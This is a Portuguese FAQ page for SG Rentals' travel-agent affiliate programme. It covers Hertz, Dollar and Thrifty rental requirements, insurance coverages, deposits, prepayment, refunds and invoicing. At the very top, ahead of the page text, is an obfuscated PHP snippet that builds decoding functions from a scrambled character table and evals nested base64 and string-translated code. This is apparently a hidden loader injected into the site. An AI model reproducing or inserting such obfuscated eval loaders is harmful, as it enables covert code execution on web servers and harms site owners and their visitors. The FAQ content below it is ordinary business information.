$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iT05FWVRXbWdjb1FTcGtac1hSdmF4cnFJRlViS2pDTUd1bEJoZFBETHR5aXdWZWZKQW5IelBWalVkaEJydUx0SmxIZW9DYUtER0VRd2tPc1htV2dSY1lUeXBTdmZpYk5aTUZxbkF6eElTdjlaRHhBcnZ0TD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> Programa Afiliado SG Rentals

Perguntas frequentes

Locações Hertz/Dollar/ Thrifty

Quais são os requisitos para alugar um veículo Hertz, Dollar ou Thrifty?

Para alugar um veículo nos Estados Unidos, o condutor precisa ter 25 anos* ou mais, cartão de crédito internacional com limite disponível para bloqueio caução** e 01 ano de habilitação. A CNH deve estar válida durante a locação. A tolerância de 30 dias após seu vencimento, não é válida no exterior.

Todos os documentos devem ser do condutor principal do veículo, sendo ele o titular da reserva. Tanto o condutor principal quanto o adicional, precisam ter mais de 25 anos.

*Condutores com idades entre 20 e 24 anos podem alugar determinadas categorias mediante pagamento de uma taxa que varia de acordo com o destino e grupo de carro. Informe-se sobre a política de cada localidade, taxa cobrada e exceções. Em alguns países, a idade mínima exigida poderá ser de 30 anos, dependendo da categoria alugada. Já nas cidades de Nova York, Miami e Quebec, é possível alugar determinadas categorias com a partir de 18 anos. Informe-se.

**Para algumas categorias de carro, a Locadora poderá exigir a apresentação de dois cartões de crédito para bloqueio caução. Informe-se sobre as regras com a nossa equipe.

Para locações no estado da Geórgia (EUA) a carteira de habilitação internacional é fortemente recomendável. Este não é um requisito que impedirá o cliente de alugar um veículo. Porém, por se tratar de leis estaduais e a fim de evitar qualquer contratempo com as autoridades locais, recomendamos que o cliente atenda a essa exigência.

Para locações na Europa, a carteira de habilitação internacional também é fortemente recomendada. Caso o condutor envolva-se em um acidente ou seja abordado por uma autoridade local, e não apresente a Carteira de Habilitação Internacional, estará sujeito à multa e apreensão do veículo.  A Locadora poderá ainda cobrar o valor da franquia mais impostos, independente do perfil tarifário contratado, e reserva-se o direito de recusar a entrega do veículo caso o condutor não apresente a Carteira de Habilitação Internacional.

Para locações na Austrália, África do Sul e Nova Zelândia, a Carteira de Habilitação Internacional é obrigatória. Lembramos que a Carteira de Habilitação Internacional só terá validade quando apresentada junto à Carteira de Habilitação Nacional.

Quais documentos o cliente deve apresentar no momento da retirada do veículo?

 

 –  Habilitação nacional válida (a tolerância de 30 dias após vencimento da CNH não é válida no exterior)

– Cartão de crédito internacional em nome do titular da reserva (um bloqueio caução será realizado durante a locação)

– Passaporte

– Voucher impresso (não serão aceitos vouchers apresentados por meio de celulares ou qualquer outro dispositivo eletrônico), exceto quando a tarifa for voucherless. Esta informação vem especificada no voucher que é encaminhado por e-mail.

Quais proteções podem estar incluídas nas tarifas Hertz nos Estados Unidos?

– LDW (Loss Damage Waiver): Proteção do veículo Hertz contra dano ou roubo. Não há franquia para você pagar

– LIS (Liability Insurance Supplement): Proteção adicional a terceiros com cobertura de até US$ 1.000.000

Quais proteções adicionais podem ser oferecidas nas lojas Hertz nos Estados Unidos?

– PERS (Premium Emergency Roadside Service): Cobre gastos inesperados, tais como chave trancada dentro do veículo, perda de chaves, troca de pneus, bateria sem carga, falta de combustível e guincho

– PAI/PEC (Personal Accident Insurance / Personal Effects Coverage): Cobre os seus pertences no interior do veículo e despesas médicas do motorista e passageiros.

– ESP (Emergency Sickness Protection): Proteção de emergência médica em caso de doença. Cobertura de até US$ 10.000 para o locatário e seus familiares durante todo o período de locação. Disponível em localidades selecionadas.

Vale ressaltar que, para estarem cobertos, os passageiros devem ser parentes diretos do motorista. Outras regras são aplicáveis. Favor verificar com a equipe de atendimento / SAC.

Quais proteções podem estar incluídas nas tarifas Hertz na Europa?

– CDW (Collision Damage Waiver): Proteção parcial do veículo Hertz contra dano, com cobrança de franquia. Presente na tarifa ALI.

– TP: Proteção parcial do veículo contra roubo, com cobrança de franquia. Presente na tarifa ALI.

– Super CDW/TP: Proteção do veículo contra dano e roubo, sem cobrança de franquia. (Exceto negligência, pneus, vidros, acessórios e ausência do Boletim de Ocorrência.) Alguns países podem cobrar uma taxa administrativa em caso de sinistro. Presente na tarifa SDW.

– PI (Personal Accident Insurance / Personal Effects): Oferece cobertura para itens pessoais no interior do veículo e despesas médicas para o motorista e passageiros. Presente na tarifa SDW e disponível nos principais países da Europa. Consulte maiores detalhes com nossa equipe.

Quais proteções adicionais podem ser oferecidas nas lojas Hertz na Europa?

– Super CDW/TP: Proteção do veículo contra dano e roubo, sem cobrança de franquia. (Exceto negligência, pneus, vidros, acessórios e ausência do Boletim de Ocorrência.) Alguns países podem cobrar uma taxa administrativa em caso de sinistro. Proteção pode ser adquirida na loja, caso a tarifa contratada tenha sido a ALI.

– PI (Personal Insurance / Personal Effects): Oferece cobertura para itens pessoais no interior do veículo e despesas médicas para o motorista e passageiros, caso a tarifa contratada seja a ALI.

– PERS (Premium Emergency Roadside Service): Cobre despesas inesperadas, tais como chave trancada dentro do veículo, perda de chaves, troca de pneus, bateria sem carga, falta de combustível e guincho.

– Glass & Tyres: Oferece cobertura para eventuais danos causados à vidros e pneus do veículo.

Quais proteções podem estar incluídas nas tarifas Dollar e Thrifty nos Estados Unidos?

– LDW (Loss Damage Waiver): Proteção do veículo Dollar/Thrifty contra dano ou roubo. Não há franquia para você pagar

– SLI (Suplemental Liability Insurance): Proteção adicional a terceiros com cobertura de até US$ 1.000.000

Quais proteções adicionais podem ser oferecidas nas lojas Dollar e Thrifty nos Estados Unidos?

– PPP (Personal Protection Plan): Cobre despesas médicas do condutor e passageiros em caso de acidente com morte ou danos pessoais. Também assegura proteção para bens pessoais no interior do veículo.

– ESP (Emergency Sickness Protection): Proteção de emergência médica em caso de doença. Cobertura de até US$ 10.000 para o locatário e seus familiares durante todo o período de locação. Disponível em localidades selecionadas.

– Road Safe: Esta proteção cobre gastos inesperados, tais como chave trancada dentro do veículo, troca de pneus, bateria sem carga, falta de combustível e guincho.

Vale ressaltar que, para estarem cobertos, os passageiros devem ser parentes diretos do motorista. Outras regras são aplicáveis. Favor verificar com a equipe de atendimento / SAC.

Como identificar se serviços adicionais foram inseridos no contrato de locação?

No momento da retirada do veículo, serão oferecidas proteções e serviços que são vendidos exclusivamente nas lojas. A contratação destes opcionais não é obrigatória e cabe ao cliente adquiri-las ou não. Quando o campo Total Estimated Charges descrever um valor, significa que serviços adicionais foram adquiridos. Ao assinar o contrato de locação, o condutor do veículo está afirmando que aceita os opcionais. O condutor deve verificar todos os detalhes de seu contrato antes de assiná-lo e caso não concorde com alguma inclusão, deve solicitar os devidos ajustes antes de sair da loja. Serviços aceitos localmente não são reembolsáveis.

Quais são as opções de reabastecimento dos veículos Hertz, Dollar e Thrifty?

– Seu cliente pode comprar um tanque de combustível no momento da locação. É mais uma conveniência que elimina a necessidade de reabastecer o veículo antes da devolução. Ele pode devolvê-lo com qualquer quantidade de combustível, porém  não será reembolsado pelo combustível não utilizado;

– Podemos reabastecer para seu cliente. O veículo poderá ser devolvido com qualquer quantidade de combustível. Por este serviço, ele será cobrado(a) pela taxa de reabastecimento mais a quantidade de combustível necessária para completar o tanque. (O valor por litro é definido pelas locadoras. Não é o mesmo valor dos postos de combustível)

– Algumas tarifas incluem o tanque de combustível. Neste caso, o mesmo poderá ser devolvido vazio.

Meu cliente quer alugar carros diferenciados. Há alguma frota especial?

A Hertz oferece 4 frotas especiais: Prestige Collection (categoria ímpar de veículos com desempenho superior que pode transformar uma simples viagem de negócios ou de férias numa  experiência especial) / Dream Collection (carros luxuosos e de alta performance para uma grande aventura com muito estilo) / Adrenaline Collection (versões especiais dos mais populares carros esportivos)  / Green Collection (linha de veículos híbridos a diesel, elétricos e limpos que oferecem alta eficiência de combustível)

É possível escolher um modelo de veículo específico que o meu cliente queira?

Sim. Com a Hertz, pode-se reservar alguns modelos específicos desde que ele pertença a uma das frotas especiais (Prestige, Adrenaline, Dream e Green Collection).

Com o serviço  HERTZ ULTIMATE CHOICE, DOLLAR CUSTOMER CHOICE / THRIFTY CHOICE SERVICE, seu cliente pode escolher o modelo de carro dentro da categoria reservada, de acordo com a disponibilidade. Este serviço é oferecido nos principais aeroportos dos Estados Unidos, e está disponível para as categorias CCAR (Compacto), ICAR (Intermediário) e FCAR (Full-size).

Meu cliente quer alugar um carro com GPS. Como proceder?

Existem algumas tarifas (All Inclusive + GPS e All Inclusive Light + GPS) que já incluem o equipamento, mas seu cliente pode contratá-lo como serviço opcional nas tarifas que não o incluem, mediante disponibilidade.

Como o cliente deve proceder para passar pelas praças de pedágios e radares eletrônicos?

– Todos os veículos Hertz são equipados com o PlatePass para sua maior comodidade e economia de tempo. O sistema permite que o usuário passe pelas faixas de pedágio sem ter a necessidade de parar para efetuar o pagamento. Para utilizar, é só passar pelas faixas exclusivas. Ao utilizar o PlatePass, seu cliente somente será cobrado pelos dias que utilizar o aparelho mais os valores dos pedágios. Algumas vias dos EUA são automatizadas com radares eletrônicos e não possuem a praça de pedágio. Neste caso, ao trafegar por estas áreas, o sistema também será automaticamente acionado.

– Já com a Dollar e a Thrifty é um pouco diferente: O cliente deve solicitar no momento da retirada ou da devolução do carro. O serviço e o valor cobrado é fixo, independente da quantidade de pedágios utilizados. Caso este serviço não seja contratado, o cliente será responsável pelo pagamento de todos os pedágios. Se o condutor trafegar por áreas de radares eletrônicos e o serviço do PlatePass também não estiver ativado, uma infração será cometida e o condutor será responsável pelo custo do pedágio + uma taxa administrativa que será cobrada por cada infração.

Há cobrança de transfer entre as lojas e os Portos da Flórida?

Não, nem vice-versa. Para isto, é necessário que a reserva seja feita para as seguintes lojas:

– Porto de Miami: Hertz (do porto para a loja: MIAP37 / da loja para o porto: MIAC10) Dollar: MIAP01 / Thrifty: PM4

– Fort Lauderdale: Hertz (do porto para a loja: FLLP24 / da loja para o porto: FLLC25) Dollar: FLLC19 / Thrifty: FL9

– Cabo Canaveral: Hertz: MLBN10 / Dollar: MLBC01 / Thrifty: MU2

– Tampa: Somente Hertz: do porto para a loja: TPAP15 / da loja para o porto: TPAC17.

O que acontece em caso de multas?

Multas por infrações de trânsito são aplicadas pelo País/Estado/Cidade onde ocorreu o fato e não pela locadora. Uma taxa administrativa será cobrada pela Locadora.

Como proceder em caso de sinistro (Roubo,Furto e/ou colisão) ?

Em caso de sinistro (Roubo, Furto e/ou Colisão) é imprescindível registrar um boletim de ocorrência no órgão competente local e informar a Locadora. O B.O. deverá ser registrado até 24 horas após o incidente.

Qual é o procedimento para solicitar a travessia Chile/Argentina?
  • A solicitação deve ser feita com 72 horas de antecedência à travessia;
  • O veículo não pode ser devolvido no Chile, é obrigatório o retorno a Argentina ou vice versa;
  • Caso a reserva seja confirmada/emitida e não seja utilizada haverá a cobrança de multa por no-show; Neste caso específico, mesmo se a reserva for cancelada após a emissão da documentação, a taxa será cobrada devido a documentação especial que é preparada pra que o cliente entre no Chile/Argentina;
  • O cliente será cobrado por uma proteção adicional + taxas;
  • Os dados necessários do condutor principal e adicional são: número do passaporte, nacionalidade dos clientes, número da habilitação, quantidade de pessoas que estarão no veículo,   incluindo os motoristas;
  • Dados do cartão de crédito apenas do motorista principal;
  • Estando ciente de todas regras citadas, o formulário solicitado ao nosso Special Desk deve ser enviado ao e-mail que será informado.
Há alguma coisa a mais que preciso saber?

– Um upgrade de categoria pode ser oferecido ao seu cliente. Se aceito, será cobrado em seu cartão.

– É preciso ficar atento quanto ao horário de devolução, pois minutos ou horas excedentes resultarão na cobrança de extras.

– Não é permitido fumar nos veículos Hertz, Dollar ou Thrifty. Implica-se multa.

– Peça para o seu cliente ler atentamente o contrato de locação antes de assiná-lo.


PRÉ-PAGAMENTO 

Como funciona o pré-pagamento?

O Pré-pagamento pode ser realizado através das ferramentas online ou através dos números:

Hertz: (11) 3524 7525 – Grande São Paulo ou 0800 602 7525 – Demais Regiões

Dollar: (11) 3524 7540 – Grande São Paulo ou 0800 750 0070 – Demais Regiões

Thrifty: (11) 3524 7545 – Grande São Paulo ou 0800 719 7625 – Demais Regiões

Quais os benefícios do pré-pagamento?

O pagamento é realizado em reais, garantindo o câmbio do dia da emissão. O cliente não tem que pagar a taxa de IOF de 6,38%, cobrada pelas administradoras de cartões de crédito pelas despesas em moedas estrangeiras. Além disto, o cliente pode parcelar em até 05 vezes sem juros e já viaja com o voucher sabendo de todas as inclusões e condições de sua tarifa.

Qual é o prazo para o cliente pré-pagar uma reserva e como o voucher é encaminhado?

Solicitamos uma antecedência de no mínimo 03 dias para que o pré-pagamento seja realizado. Este prazo visa evitar transtornos quanto à pagamento vinculado. Caso o cliente solicite pré-pagar com menos tempo de antecedência, peça para entrar em contato conosco para verificarmos a possibilidade da emissão Todos os vouchers são encaminhados para os clientes via e-mail.

O prazo mínimo para emissão com pré-pagamento é de 03 dias de antecedência da retirada do veículo. Este prazo visa evitar transtornos quanto a pagamento vinculado. Para exceções entrar em contato com a central de reservas Hertz/Dollar/Thrifty Internacional para verificar a possibilidade. Os vouchers estarão disponíveis aos agentes no portal e/ou via e-mail.

 


CAUÇÃO 

Quando o cliente pré-paga, ele deve apresentar o cartão de crédito para bloqueio caução?

Sim, mesmo o cliente pré-pagando será necessário que ele apresente o cartão no momento da retirada do veículo, para que seja realizado o bloqueio caução. É importante que o cliente seja informado sobre este procedimento para não ser pego de surpresa. Ele deverá apresentar um cartão de crédito internacional com limite disponível para bloqueio.

Nos Estados Unidos, o valor do bloqueio no cartão será de no mínimo US$ 200,00 ou 150% do valor do aluguel dependendo do que for maior.

No Estado da Flórida, caso o cliente não tenha cartão de crédito, poderá deixar o bloqueio caução em espécie (US$ 200,00). A locação deverá ser impreterivelmente pré-paga e a tarifa incluir no mínimo a proteção LDW e quilometragem livre. Se serviços adicionais forem contratados, deverão ser pagos no momento da retirada do veículo. O bloqueio caução em dinheiro não será aceito se a reserva incluir o GPS ou se o equipamento for contratado na loja. Para estes casos, apenas será liberado o bloqueio através de um cartão. Se a loja possuir dinheiro em caixa, o cliente será reembolsado pelos US$ 200,00 no momento da devolução do veículo. Caso contrário, receberá um cheque em US$ no endereço informado no contrato, para que seja trocado em qualquer casa de câmbio. O cheque pode levar de 60 a 90 dias para ser emitido.

Para Europa, América Latina e demais localidades, o bloqueio caução será feito apenas no cartão de crédito. O valor poderá variar de acordo com as condições da tarifa contratada e grupo de carro reservado. Para determinadas categorias de carro, a Locadora poderá exigir a apresentação de dois cartões de crédito para bloqueio caução. Informe-se sobre as regras com a nossa equipe.

Vale ressaltar que, para alguns países da América Latina, se uma tarifa sem proteção for contratada, a Locadora poderá bloquear o valor venal do veículo.


CANCELAMENTO

Como proceder para cancelar uma reserva?

As reservas com data de retirada futura podem ser canceladas diretamente no portal SG Rentals. Caso isso seja feito, o departamento financeiro da SG será notificado para efetuar o cancelamento do voucher e proceder com o reembolso. Já para as reservas com data de retirada passada, não será possível cancelar a reserva, devendo neste caso ser aberto um processo com nosso departamento de SAC, que dará andamento ao reembolso.


REEMBOLSO

Como funciona o reembolso integral?

Os reembolsos serão processados de acordo com a forma de pagamento utilizada na emissão e estarão sujeitos a multa de 5% quando pagos com cartão de crédito, 2% quando pagos com depósito ou transferência bancária, e são isentos de multa caso a emissão seja faturada.

Se o veículo for devolvido antes do previsto, favor contatar o departamento de SAC através do site www.sgrentals.com.br, para análise do reembolso conforme a tarifa contratada. Para o reembolso, será utilizado o mesmo câmbio do dia do pagamento. Informarmos que a Hertz Portugal e a Hertz Austrália não realizam reembolso de diárias não utilizadas, quando pré-pagas.

E se o cliente alterar a reserva depois de já ter feito o pagamento?

Para alteração de uma reserva será necessário contatar a nossa equipe de atendimento. A reserva pode ser alterada mesmo tendo sido realizado o pré-pagamento.

Caso, haja diferença de valores,  superior ou inferior, haverá cobrança da diferença ou reembolso.

 

O cliente não pegou o carro na data, ele será reembolsado?

Sim, ele será reembolsado e aplicam-se as mesmas regras de reembolso integral. Será necessário abrir um processo de SAC através do SG Rentals para solicitar o reembolso das diárias não utilizadas.

Vale ressaltar que o reembolso parcial será feito de acordo com as condições da tarifa contratada.

Informarmos que a Hertz Portugal e a Hertz Austrália não realizam reembolso de diárias não utilizadas.

O cliente ficou menos tempo com o veículo, ele será reembolsado?

Sim, ele será reembolsado. O reembolso parcial deve ser solicitado diretamente à equipe do SAC, sendo necessário abrir um processo através do site SG Rentals. Informarmos que a Hertz Portugal e a Hertz Austrália não realizam reembolso de diárias não utilizadas.

 


FATURAMENTO

Qual é o prazo de faturamento?

O faturamento é gerado quinzenalmente de acordo com a data de emissão do voucher. As emissões de 01 a 15 serão faturadas no dia útil subsequente e a fatura terá vencimento dia 22 do mês corrente. Já para as emissões ocorridas entre dias 16 e 31 o vencimento da fatura será dia 07 do mês seguinte.

Qual será o câmbio utilizado para o faturamento?

O câmbio utilizado para cobrança em fatura será sempre a taxa do dia da emissão do voucher. Nosso câmbio é atualizado diariamente após as 11h30, certifique-se de consulta-lo em nosso portal ao realizar uma emissão.

Qual será o valor que será cobrado em fatura?

O valor cobrado em fatura será sempre o que constar no voucher de pré-pagamento em dólares. Esse valor será convertido em R$ ao câmbio do dia da emissão e terá sua comissão descontada para que a cobrança em fatura seja no valor líquido da emissão em reais.

O que fazer em caso de problemas com a fatura?

Sempre que houver problemas ou dúvidas com relação a fatura enviada, os questionamentos deverão ser enviados ao Depto. de Faturamento antes do vencimento, de forma que todos os questionamentos possam ser solucionados dentro do prazo de vencimento, evitando assim pendências financeiras.

Quais são as formas de pagamento das faturas?

As faturas deverão ser pagas via depósito ou transferência bancária, conforme dados abaixo:

Banco Bradesco S/A | Agência: 3395-2 | C/C: 156239-8
Banco Itaú Unibanco | Agência: 0170 | C/C: 82009-6
Banco Santander | Agência: 4722 | C/C: 13000369-6
SG Viagens e Turismo Ltda
CNPJ: 06.039.668/0001-29

Como cancelar reservas e vouchers faturados

As reservas devem ser canceladas diretamente no site, utilizando a própria senha de emissão. Para evitarmos cobranças indevidas de vouchers com reserva já cancelada, é importante que todos os cancelamentos sejam informados por e-mail ao departamento de faturamento.

Como solicitar reembolso das cobranças em fatura?

Nos casos de reembolso de voucher cuja data de retirada tenha ocorrido deverá ser solicitado através da área de SAC do SG Rentals. Após a criação deste chamado, o departamento de SAC irá verificar com a localidade sobre a autorização deste crédito e, caso este seja confirmado, deverá constar na próxima fatura. O prazo máximo para estas respostas é de 15 dias úteis. Já os vouchers que a data de locação ainda não tenha ocorrido podem ser reembolsados de maneira imediata através de solicitação via e-mail ao departamento de faturamento, informando o cancelamento da reserva em questão. Importante lembrar que todos os vouchers cobrados em fatura deverão ser pagos e nenhum deles poderá ser retirado do pagamento sem autorização, pois caso a fatura seja paga parcialmente isso poderá gerar o bloqueio do acesso ao sistema para emissão de novos vouchers.

O que acontece quando uma fatura não é paga?

A falta de pagamento da fatura após 03 dias úteis da data do vencimento implicará no bloqueio do sistema para futuras emissões de vouchers.

VOLTAR AO SG RENTALS